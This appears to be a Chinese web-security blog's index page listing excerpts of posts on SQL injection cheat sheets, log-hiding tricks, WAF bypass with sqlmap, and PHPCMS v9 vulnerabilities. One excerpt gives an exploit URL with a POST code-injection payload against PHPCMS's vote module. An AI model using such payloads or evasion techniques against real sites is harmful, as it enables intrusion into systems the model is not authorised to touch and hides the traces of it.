Menu

web安全

SQL注入速查表(下)与Oracle注入速查表
一、SQL注入速查表(下) 0x00 目录 盲注 关于盲注 实战中的盲注实例 延时盲注 WAITFOR DELAY [time](S) 实例 BENCHMARK()(M) 实例 pg_sleep(seconds)(P) 掩盖痕迹 -sp_password log bypass(S) 注入测试 [...]
SQL注入速查表(上)
  0x00 关于SQL注入速查表 现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句,而经常发生变化。 [...]
PHPCMS_V9之authkey注入漏洞
在乌云上的某一个漏洞 PHPCMS最新版本authkey泄露可注射拿shell 但是他没有给出利用的方法,如何利用authkey 我有朋友写出了该漏洞的exp 比较鸡肋,成功率不高,不过还是分享给大家。 利用方式 : 首先你得有php的环境并且启动curl_init()函数 php [...]
PHPCMS_v9之投票漏洞
废话不多说,直接上EXP EXP http://www.XXXXX.com.cn/index.php?m=vote&c=index&a=post&subjectid=1 post: subjectid=1&radio[]=);phpinfo();%80 或者 [...]
SQLMAP 防火墙的绕过与过滤
[为0x00] – 简介 [0X01] – 过滤闪避(MySQL的) [0x01a] – 旁路功能和关键字过滤 [0x01b] – 绕过正则表达式过滤 [0X02] – 通常情况下旁路技术 [0X03] – 高级旁路技术 [0x03a] [...]